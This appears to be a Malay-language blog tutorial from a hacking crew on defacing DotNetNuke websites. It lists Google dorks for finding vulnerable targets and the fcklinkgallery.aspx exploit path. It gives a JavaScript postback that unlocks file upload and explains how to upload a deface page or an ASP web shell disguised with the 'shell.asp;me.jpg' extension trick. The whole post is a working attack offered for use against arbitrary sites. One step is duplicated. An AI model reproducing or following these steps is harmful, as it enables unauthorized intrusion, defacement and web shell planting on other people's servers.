1. Cari vuln web dengan menggunakan google dork dibawah :
- inurl:portals/0/
- inurl:tabid/176/Default.aspx
- inurl:fcklinkgallery.aspx
Search di google dan pilih satu website.
2. Potong setengah link target seperti ini --> http://www.target.com/
3. Tambahkan exploit dibawah di URL dan tekan enter :
Contoh :
http://www.target.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
4. Akan keluar seperti gambar dibawah :
5. Tandakan pada ---> File ( A File On Your Site )
Dan akan keluar seperti gambar dibawah :
Dan akan keluar seperti gambar dibawah :
6. Kemudian padam SEMUA URL di address bar.
7. Masukkan JavaScript ini pada link yang dipadam tadi :
javascript:__doPostBack('ctlURL$cmdUpload','')
ENTER!
note: bagi pengguna google chrome anda perlu type balik javascript ini...jika anda paste ianya tidak akan menjadi.
7. Masukkan JavaScript ini pada link yang dipadam tadi :
javascript:__doPostBack('ctlURL$cmdUpload','')
ENTER!
note: bagi pengguna google chrome anda perlu type balik javascript ini...jika anda paste ianya tidak akan menjadi.
Dan akan keluar seperti gambar dibawah.perhatikan kotak merah :
8. Sekarang anda sudah dapat untuk upload file deace anda!
Choose file, pilih deface anda, dan tekan Upload Selected File.Supported Files:
*. docx, *.xlsx, *.pptx, *.swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.spin
note: anda jugak boleh mengupload shell asp dengan extension seperti ini : shell.asp;me.jpg
9. Untuk tngok hasil deface anda cuma perlu masukkan link seperti dibawah :
http://www.target.com/portals/0/defaceanda.txt
atau tengok shellhttp://www.target.com/portals/0/shell.asp;me.jpg
10. DONE!!!
Credit To : Newbie3viLc063s Crew
Baiklah itu sahaja untuk kali ini....semoga berjaya!!!Assalamualaikum...
0 comments:
Post a Comment